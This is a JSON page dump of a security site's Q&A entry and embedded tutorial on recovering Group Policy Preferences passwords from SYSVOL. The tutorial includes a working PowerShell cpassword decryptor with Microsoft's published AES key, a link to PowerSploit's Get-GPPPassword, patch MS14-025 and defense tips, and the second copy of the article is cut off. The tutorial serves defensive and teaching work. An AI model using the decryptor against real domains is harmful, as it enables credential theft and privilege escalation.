[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWc89ESbgdKGUGMTVtqK1AQnQESgcOjswhAaFS00GAAY":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},1147,"Why is the AES-256 encryption used for cpassword considered a security weakness in Active Directory?","Although AES-256 is a strong encryption algorithm, Microsoft made a critical mistake by publishing the private key used for encrypting cpassword in Group Policy Preferences. The key is static and identical across all Windows domains, meaning anyone can download it from MSDN and decrypt any cpassword value. This effectively makes the encryption useless, as shown in [Domain Penetration - Recovering Passwords Stored in Group Policy via SYSVOL](\u002Fnews\u002Fdomain-penetration-recovering-passwords-stored-in-group-policy-via-sysvol).","\u003Cp>Although AES-256 is a strong encryption algorithm, Microsoft made a critical mistake by publishing the private key used for encrypting cpassword in Group Policy Preferences. The key is static and identical across all Windows domains, meaning anyone can download it from MSDN and decrypt any cpassword value. This effectively makes the encryption useless, as shown in [Domain Penetration - Recovering Passwords Stored in Group Policy via SYSVOL](\u002Fnews\u002Fdomain-penetration-recovering-passwords-stored-in-group-policy-via-sysvol).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-recovering-passwords-stored-in-group-policy-via-sysvol\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","why-is-the-aes-256-encryption-used-for-cpassword-considered-a-security-weakness--1777480400668","AES-256 private key, cpassword weakness, Microsoft published key, Group Policy encryption flaw",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},278,"Domain Penetration - Recovering Passwords Stored in Group Policy via SYSVOL","domain-penetration-recovering-passwords-stored-in-group-policy-via-sysvol","Learn how to recover passwords stored in Group Policy via SYSVOL, analyze exploitable aspects, and get defense tips for domain security.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Domain Penetration - Local Administrator Password Solution', we analyzed the exploitation of LAPS. The greatest advantage of using LAPS is that it ensures each domain host has a different password, which is regularly changed.\u003C\u002Fp>\u003Cp>So, if LAPS is not configured within the domain, how can the local administrator passwords of domain hosts be set in bulk? What exploitable aspects exist in this process?\u003C\u002Fp>\u003Cp>This article will introduce how to recover passwords stored in Group Policy using SYSVOL, analyze the technical details, and finally provide defense recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to the domain shared folder \\\\SYSVOL\u003C\u002Fli>\u003Cli>Methods for domain administrators to modify local administrator passwords of domain hosts in bulk\u003C\u002Fli>\u003Cli>Exploitable aspects in Group Policy\u003C\u002Fli>\u003Cli>Practical testing\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to the Domain Shared Folder \\\\SYSVOL\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Within a domain, there exists a default shared path:\u003C\u002Fp>\u003Cp>\\\\\u003Cdomain>\\SYSVOL\\\u003Cdomain>\\\u003C\u002Fdomain>\u003C\u002Fdomain>\u003C\u002Fp>\u003Cp>All hosts within the domain can access it, storing Group Policy-related data, including login script configuration files, etc.\u003C\u002Fp>\u003Cp>For example, if the test host's domain is test.local, the shared folder \\\\test.local\\SYSVOL\\test.local can be accessed, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016726326_0_428b7ae92a.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Method for Domain Administrators to Batch Modify Local Administrator Passwords on Domain Hosts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Testing Server 2003 System\u003C\u002Fh3>\u003Cp>For Server 2003, to batch modify local administrator passwords on domain hosts, it is often done by configuring Group Policy to execute a VBS script.\u003C\u002Fp>\u003Cp>Here is a VBS script for changing passwords (implementation methods may vary), with the code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>strComputer = \".\"\u003Cbr>Set objUser = GetObject(\"WinNT:\u002F\u002F\" &amp; strComputer &amp; \"\u002FAdministrator, user\")\u003Cbr>objUser.SetPassword \"domain123!\"\u003Cbr>objUser.SetInfo\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The biggest drawback of this implementation is that the modified password is stored in plaintext in the VBS script.\u003C\u002Fp>\u003Cp>And this VBS script is usually saved in the shared folder \\\\SYSVOL.\u003C\u002Fp>\u003Cp>This creates a potential risk:\u003C\u002Fp>\u003Cp>\u003Cstrong>Any domain user can read the VBS script, thereby obtaining the plaintext password stored in the script.\u003C\u002Fstrong>\u003C\u002Fp>\u003Ch3>2. Testing Server 2008 System\u003C\u002Fh3>\u003Cp>For Server 2008, a new feature was added, allowing the use of Group Policy Preferences to configure group policies for batch modification of local administrator passwords. The specific method is as follows:\u003C\u002Fp>\u003Cp>Start - Administrative Tools - Group Policy Management\u003C\u002Fp>\u003Cp>Select the domain test.local, right-click, and choose 'Create a GPO in this domain, and Link it here', as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016730680_1_0828b565ac.jpeg\">\u003C\u002Fp>\u003Cp>Set the name as test6\u003C\u002Fp>\u003Cp>test6 - Settings - Right-click - Edit - User Configuration - Preferences - Control Panel Settings - Local Users and Groups, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016735119_2_7be30dc37a.jpeg\">\u003C\u002Fp>\u003Cp>Update, administrator (built-in), set password, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016738529_3_ae3cb52aca.jpeg\">\u003C\u002Fp>\u003Cp>Delegation, set permissions.\u003C\u002Fp>\u003Cp>In the details section, you can see that the policy corresponds to ID {E6424F10-C44B-4C45-8527-740189CBF60E}\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016742037_4_42f9ab8fbc.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the Group Policy configuration is complete. Domain hosts will apply this policy upon re-login\u003C\u002Fp>\u003Cp>In the shared folder \\\\SYSVOL, you can see the folder corresponding to the Group Policy ID, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016745610_5_ecf76df165.jpeg\">\u003C\u002Fp>\u003Cp>Since we just modified the Control Panel under user configuration, we can find the configuration file Groups.xml in the corresponding folder. The specific path is as follows:\u003C\u002Fp>\u003Cp>\\\\test.local\\SYSVOL\\test.local\\Policies\\{E6424F10-C44B-4C45-8527-740189CBF60E}\\User\\Preferences\\Groups\u003C\u002Fp>\u003Cp>The content of Groups.xml is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\" ?--> \u003Cbr>- \u003Cgroups clsid=\"{3125E937-EB16-4b4c-9934-544FC6D24D26}\">\u003Cbr>- \u003Cuser clsid=\"{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}\" name=\"Administrator (built-in)\" image=\"2\" changed=\"2017-09-25 22:57:53\" uid=\"{463245FF-08D3-4A28-95E7-42AB416DC508}\">\u003Cbr>  \u003Cproperties action=\"U\" newname=\"\" fullname=\"\" description=\"\" cpassword=\"9XLcz+Caj\u002FkyldECku6lQ1QJX3fe9gnshWkkWlgAN1U\" changelogon=\"0\" nochange=\"0\" neverexpires=\"0\" acctdisabled=\"0\" subauthority=\"RID_ADMIN\" username=\"Administrator (built-in)\"> \u003Cbr>  \u003C\u002Fproperties>\u003C\u002Fuser>\u003Cbr>  \u003C\u002Fgroups>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016747666_6_9f5e911f11.jpeg\">\u003C\u002Fp>\u003Cp>Notably, the cpassword item stores the encrypted content \"9XLcz+Caj\u002FkyldECku6lQ1QJX3fe9gnshWkkWlgAN1U\"\u003C\u002Fp>\u003Cp>The encryption method is AES 256. Although AES 256 is currently difficult to crack, Microsoft has chosen to publicly disclose the private key for this AES 256 encryption. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc422924.aspx\u003C\u002Fp>\u003Cp>With this private key, we can restore the plaintext\u003C\u002Fp>\u003Cp>The restoration method can use the PowerShell script open-sourced by Chris Campbell @obscuresec. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FGet-GPPPassword.ps1\u003C\u002Fp>\u003Cp>This script can be executed on a domain host, automatically querying files in the shared folder \\SYSVOL and restoring all plaintext passwords\u003C\u002Fp>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016749481_7_50a00ace8a.jpeg\">\u003C\u002Fp>\u003Cp>Of course, just to decrypt cpassword=\"9XLcz+Caj\u002FkyldECku6lQ1QJX3fe9gnshWkkWlgAN1U\", we can simplify the functionality of the above PowerShell script\u003C\u002Fp>\u003Cp>The simplified code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Get-DecryptedCpassword {\u003Cbr>    [CmdletBinding()]\u003Cbr>    Param (\u003Cbr>        [string] $Cpassword \u003Cbr>    )\u003Cbr>\u003Cbr>    try {\u003Cbr>        #Append appropriate padding based on string length  \u003Cbr>        $Mod = ($Cpassword.length % 4)\u003Cbr>        \u003Cbr>        switch ($Mod) {\u003Cbr>        '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}\u003Cbr>        '2' {$Cpassword += ('=' * (4 - $Mod))}\u003Cbr>        '3' {$Cpassword += ('=' * (4 - $Mod))}\u003Cbr>        }\u003Cbr>\u003Cbr>        $Base64Decoded = [Convert]::FromBase64String($Cpassword)\u003Cbr>        \u003Cbr>        #Create a new AES .NET Crypto Object\u003Cbr>        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider\u003Cbr>        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,\u003Cbr>                             0xf4,0x96,0x8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)\u003Cbr>        \u003Cbr>        #Set IV to all nulls to prevent dynamic generation of IV value\u003Cbr>        $AesIV = New-Object Byte[]($AesObject.IV.Length) \u003Cbr>        $AesObject.IV = $AesIV\u003Cbr>        $AesObject.Key = $AesKey\u003Cbr>        $DecryptorObject = $AesObject.CreateDecryptor() \u003Cbr>        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)\u003Cbr>        \u003Cbr>        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)\u003Cbr>    } \u003Cbr>    \u003Cbr>    catch {Write-Error $Error[0]}\u003Cbr>}  \u003Cbr>Get-DecryptedCpassword \"9XLcz+Caj\u002FkyldECku6lQ1QJX3fe9gnshWkkWlgAN1U\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The decrypted plaintext password is domain123!, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016750976_8_9372477512.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Exploitable Areas in Group Policy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Exploitable areas in Group Policy are not limited to the location for modifying administrator passwords, but also include the following:\u003C\u002Fp>\u003Cp>Services\\Services.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc980070(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>ScheduledTasks\\ScheduledTasks.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc422920(v=prot.13)\u003C\u002Fli>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fdd341350(v=prot.13)\u003C\u002Fli>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fdd304114(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Printers\\Printers.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc422918(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Drives\\Drives.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc704598(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>DataSources\\DataSources.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc422926(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Location referenced from https:\u002F\u002Fwebcache.googleusercontent.com\u002Fsearch?q=cache:MUNO5X9hSwUJ:rewtdance.blogspot.com\u002F2012\u002F06\u002Fexploiting-windows-2008-group-policy.html+&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us\u003C\u002Fp>\u003Cp>However, the above location is not absolute; during configuration, it is necessary to enter the username and password in the Group Policy, and the corresponding Groups.xml will contain the cpassword attribute, which can then be used to restore the plaintext password\u003C\u002Fp>\u003Cp>Take scheduled tasks as an example, corresponding to ScheduledTasks.xml\u003C\u002Fp>\u003Cp>The Group Policy configuration location is: User Configuration - Preferences - Control Panel Settings - Scheduled Tasks\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016751951_9_4d634b5685.jpeg\">\u003C\u002Fp>\u003Cp>When creating a new task, it is necessary to select 'Run as' and enter the username and password, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016752931_10_7adea024e8.jpeg\">\u003C\u002Fp>\u003Cp>Otherwise, it will not contain the cpassword attribute, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016753798_11_8a88503a7a.jpeg\">\u003C\u002Fp>\u003Cp>Now enter a test password (the password is testsuccess!, fake), as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016754388_12_38da4b9dbb.jpeg\">\u003C\u002Fp>\u003Cp>The corresponding ScheduledTasks.xml will also contain the cpassword attribute, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016754714_13_af2c803ede.jpeg\">\u003C\u002Fp>\u003Cp>Use PowerShell to decrypt it and restore the password as testsuccess!\u003C\u002Fp>\u003Cp>Thus, it is concluded that:\u003C\u002Fp>\u003Cp>\u003Cstrong>When domain administrators use Group Policy to manage domain hosts in bulk, if a password needs to be entered during the configuration of the Group Policy, that password will be saved to the shared folder \\\\SYSVOL, which is accessible by all domain users by default. Although encrypted, it can be easily decrypted.\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This creates a security risk. In practice, domain administrators often use domain administrator passwords in Group Policy, making the passwords in Group Policy configuration files easily obtainable and leading to privilege escalation.\u003C\u002Fp>\u003Cp>To address this, Microsoft released patch KB2962486, available for download at:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftechnet.microsoft.com\u002Flibrary\u002Fsecurity\u002Fms14-025\u003C\u002Fp>\u003Cp>After applying the patch, usernames and passwords can no longer be set in Group Policy, as shown in the following images:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016755281_14_7b00c54399.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016755420_15_07d981b581.jpeg\">\u003C\u002Fp>\u003Cp>Of course, the XML files in the shared folder \\\\SYSVOL will no longer contain the cpassword attribute.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>XML files will still synchronize with Group Policy.\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on the attack methods, the following defense options are available:\u003C\u002Fp>\u003Cp>1. Use LAPS to manage local administrator accounts on domain hosts in bulk.\u003C\u002Fp>\u003Cp>2. Install patch KB2962486 on domain controllers\u003C\u002Fp>\u003Cp>3. Do not use domain controller passwords in Group Policy\u003C\u002Fp>\u003Cp>4. Set access permissions for the shared folder \\\\SYSVOL\u003C\u002Fp>\u003Cp>5. Use PsPasswd to batch modify local administrator passwords of hosts in the domain\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article explains how to recover passwords stored in Group Policy using SYSVOL and provides defense recommendations. If an attacker obtains the local administrator password of a domain user, it can be used by default for remote login within the domain.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Domain Penetration - Local Administrator Password Solution', we analyzed the exploitation of LAPS. The greatest advantage of using LAPS is that it ensures each domain host has a different password, which is regularly changed.\u003C\u002Fp>\u003Cp>So, if LAPS is not configured within the domain, how can the local administrator passwords of domain hosts be set in bulk? What exploitable aspects exist in this process?\u003C\u002Fp>\u003Cp>This article will introduce how to recover passwords stored in Group Policy using SYSVOL, analyze the technical details, and finally provide defense recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to the domain shared folder \\\\SYSVOL\u003C\u002Fli>\u003Cli>Methods for domain administrators to modify local administrator passwords of domain hosts in bulk\u003C\u002Fli>\u003Cli>Exploitable aspects in Group Policy\u003C\u002Fli>\u003Cli>Practical testing\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to the Domain Shared Folder \\\\SYSVOL\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Within a domain, there exists a default shared path:\u003C\u002Fp>\u003Cp>\\\\\u003Cdomain>\\SYSVOL\\\u003Cdomain>\\\u003C\u002Fdomain>\u003C\u002Fdomain>\u003C\u002Fp>\u003Cp>All hosts within the domain can access it, storing Group Policy-related data, including login script configuration files, etc.\u003C\u002Fp>\u003Cp>For example, if the test host's domain is test.local, the shared folder \\\\test.local\\SYSVOL\\test.local can be accessed, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016726326_0_428b7ae92a-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Method for Domain Administrators to Batch Modify Local Administrator Passwords on Domain Hosts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Testing Server 2003 System\u003C\u002Fh3>\u003Cp>For Server 2003, to batch modify local administrator passwords on domain hosts, it is often done by configuring Group Policy to execute a VBS script.\u003C\u002Fp>\u003Cp>Here is a VBS script for changing passwords (implementation methods may vary), with the code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>strComputer = \".\"\u003Cbr>Set objUser = GetObject(\"WinNT:\u002F\u002F\" &amp; strComputer &amp; \"\u002FAdministrator, user\")\u003Cbr>objUser.SetPassword \"domain123!\"\u003Cbr>objUser.SetInfo\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The biggest drawback of this implementation is that the modified password is stored in plaintext in the VBS script.\u003C\u002Fp>\u003Cp>And this VBS script is usually saved in the shared folder \\\\SYSVOL.\u003C\u002Fp>\u003Cp>This creates a potential risk:\u003C\u002Fp>\u003Cp>\u003Cstrong>Any domain user can read the VBS script, thereby obtaining the plaintext password stored in the script.\u003C\u002Fstrong>\u003C\u002Fp>\u003Ch3>2. Testing Server 2008 System\u003C\u002Fh3>\u003Cp>For Server 2008, a new feature was added, allowing the use of Group Policy Preferences to configure group policies for batch modification of local administrator passwords. The specific method is as follows:\u003C\u002Fp>\u003Cp>Start - Administrative Tools - Group Policy Management\u003C\u002Fp>\u003Cp>Select the domain test.local, right-click, and choose 'Create a GPO in this domain, and Link it here', as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016730680_1_0828b565ac-1.jpeg\">\u003C\u002Fp>\u003Cp>Set the name as test6\u003C\u002Fp>\u003Cp>test6 - Settings - Right-click - Edit - User Configuration - Preferences - Control Panel Settings - Local Users and Groups, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016735119_2_7be30dc37a-1.jpeg\">\u003C\u002Fp>\u003Cp>Update, administrator (built-in), set password, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016738529_3_ae3cb52aca-1.jpeg\">\u003C\u002Fp>\u003Cp>Delegation, set permissions.\u003C\u002Fp>\u003Cp>In the details section, you can see that the policy corresponds to ID {E6424F10-C44B-4C45-8527-740189CBF60E}\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016742037_4_42f9ab8fbc-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the Group Policy configuration is complete. Domain hosts will apply this policy upon re-login\u003C\u002Fp>\u003Cp>In the shared folder \\\\SYSVOL, you can see the folder corresponding to the Group Policy ID, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016745610_5_ecf76df165-1.jpeg\">\u003C\u002Fp>\u003Cp>Since we just modified the Control Panel under user configuration, we can find the configuration file Groups.xml in the corresponding folder. The specific path is as follows:\u003C\u002Fp>\u003Cp>\\\\test.local\\SYSVOL\\test.local\\Policies\\{E6424F10-C44B-4C45-8527-740189CBF60E}\\User\\Preferences\\Groups\u003C\u002Fp>\u003Cp>The content of Groups.xml is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\" ?--> \u003Cbr>- \u003Cgroups clsid=\"{3125E937-EB16-4b4c-9934-544FC6D24D26}\">\u003Cbr>- \u003Cuser clsid=\"{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}\" name=\"Administrator (built-in)\" image=\"2\" changed=\"2017-09-25 22:57:53\" uid=\"{463245FF-08D3-4A28-95E7-42AB416DC508}\">\u003Cbr>  \u003Cproperties action=\"U\" newname=\"\" fullname=\"\" description=\"\" cpassword=\"9XLcz+Caj\u002FkyldECku6lQ1QJX3fe9gnshWkkWlgAN1U\" changelogon=\"0\" nochange=\"0\" neverexpires=\"0\" acctdisabled=\"0\" subauthority=\"RID_ADMIN\" username=\"Administrator (built-in)\"> \u003Cbr>  \u003C\u002Fproperties>\u003C\u002Fuser>\u003Cbr>  \u003C\u002Fgroups>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016747666_6_9f5e911f11-1.jpeg\">\u003C\u002Fp>\u003Cp>Notably, the cpassword item stores the encrypted content \"9XLcz+Caj\u002FkyldECku6lQ1QJX3fe9gnshWkkWlgAN1U\"\u003C\u002Fp>\u003Cp>The encryption method is AES 256. Although AES 256 is currently difficult to crack, Microsoft has chosen to publicly disclose the private key for this AES 256 encryption. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc422924.aspx\u003C\u002Fp>\u003Cp>With this private key, we can restore the plaintext\u003C\u002Fp>\u003Cp>The restoration method can use the PowerShell script open-sourced by Chris Campbell @obscuresec. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FGet-GPPPassword.ps1\u003C\u002Fp>\u003Cp>This script can be executed on a domain host, automatically querying files in the shared folder \\SYSVOL and restoring all plaintext passwords\u003C\u002Fp>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016749481_7_50a00ace8a-1.jpeg\">\u003C\u002Fp>\u003Cp>Of course, just to decrypt cpassword=\"9XLcz+Caj\u002FkyldECku6lQ1QJX3fe9gnshWkkWlgAN1U\", we can simplify the functionality of the above PowerShell script\u003C\u002Fp>\u003Cp>The simplified code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Get-DecryptedCpassword {\u003Cbr>    [CmdletBinding()]\u003Cbr>    Param (\u003Cbr>        [string] $Cpassword \u003Cbr>    )\u003Cbr>\u003Cbr>    try {\u003Cbr>        #Append appropriate padding based on string length  \u003Cbr>        $Mod = ($Cpassword.length % 4)\u003Cbr>        \u003Cbr>        switch ($Mod) {\u003Cbr>        '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}\u003Cbr>        '2' {$Cpassword += ('=' * (4 - $Mod))}\u003Cbr>        '3' {$Cpassword += ('=' * (4 - $Mod))}\u003Cbr>        }\u003Cbr>\u003Cbr>        $Base64Decoded = [Convert]::FromBase64String($Cpassword)\u003Cbr>        \u003Cbr>        #Create a new AES .NET Crypto Object\u003Cbr>        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider\u003Cbr>        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,\u003Cbr>                             0xf4,0x96,0x8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)\u003Cbr>        \u003Cbr>        #Set IV to all nulls to prevent dynamic generation of IV value\u003Cbr>        $AesIV = New-Object Byte[]($AesObject.IV.Length) \u003Cbr>        $AesObject.IV = $AesIV\u003Cbr>        $AesObject.Key = $AesKey\u003Cbr>        $DecryptorObject = $AesObject.CreateDecryptor() \u003Cbr>        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)\u003Cbr>        \u003Cbr>        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)\u003Cbr>    } \u003Cbr>    \u003Cbr>    catch {Write-Error $Error[0]}\u003Cbr>}  \u003Cbr>Get-DecryptedCpassword \"9XLcz+Caj\u002FkyldECku6lQ1QJX3fe9gnshWkkWlgAN1U\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The decrypted plaintext password is domain123!, as shown in the figure 